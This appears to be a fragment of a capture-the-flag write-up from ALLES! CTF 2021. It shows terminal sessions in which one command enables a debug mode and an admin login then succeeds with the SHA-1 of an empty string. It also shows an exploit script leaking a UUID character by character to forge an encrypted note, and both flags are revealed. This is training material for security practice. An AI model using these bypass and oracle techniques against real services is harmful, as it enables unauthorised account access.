$ echo '{"debugMode": true}' | http --session=./session.json POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/config"
HTTP/1.1 200
Content-Length: 2900
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:02 GMT
Set-Cookie: JSESSIONID=7D12EE368BD32FB4C496CBE29BA4A23D; Path=/; HttpOnly
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
... snip ...
<p>
<div class="alert alert-success" role="alert">
User configuration updated
</div>
</p>
</main><!-- /.container -->
</html>
$ http --session=./session.json --form POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/login" username=admin password=da39a3ee5e6b4b0d3255bfef95601890afd80709
HTTP/1.1 200
Content-Length: 2935
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:37 GMT
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
... snip ...
<h1>Welcome to the User Panel</h1>
You are <b></b>admin</b>
<br><br>
Your flag is:
ALLES!{ohh-b0y-java-y-u-do-th1s-t0-m3???!?}
<br>
<a href="logout">Logout</a>
</main><!-- /.container -->
</html>
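da39a3ee5e6b4b0d3255bfef95601890afd80709, the password value sent in the login request above,
is the SHA-1 digest of the empty string. The server accepted it for the admin account after the preceding /config request had set debugMode to true.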
Flag: ALLES!{ohh-b0y-java-y-u-do-th1s-t0-m3???!?}
$ python exploit.py
4
4c
4ca
... snip ...
4ca51bd230de44bbb2f7fab021cc73
4ca51bd230de44bbb2f7fab021cc730
user_uuid: 4ca51bd230de44bbb2f7fab021cc730e
ENCRYPT:
ENCRYPT:c
ENCRYPT:c1
... snip ...
ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT0
ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT09
cipher_note: ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT09
<!doctype html>
<html>
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css" rel="stylesheet">
<title>noter</title>
</head>
<body class="bg-gray-50">
<div class="flex flex-row bg-gray-100 px-5 py-2">
<a href="/notes" class="hover:underline hover:text-green-500 text-black py-1 px-4 font-bold">
noter <span class="text-green-500" style="font-size:.6rem">DEMO</span>
</a>
<a href="/notes" class="hover:underline hover:text-green-600 text-green-500 py-1 px-4 mr-2">ALLES!{American_scientists_said,_dont_do_WAFs!}</a>
<a href="/logout">
... snip ...
Flag: ALLES!{American_scientists_said,_dont_do_WAFs!}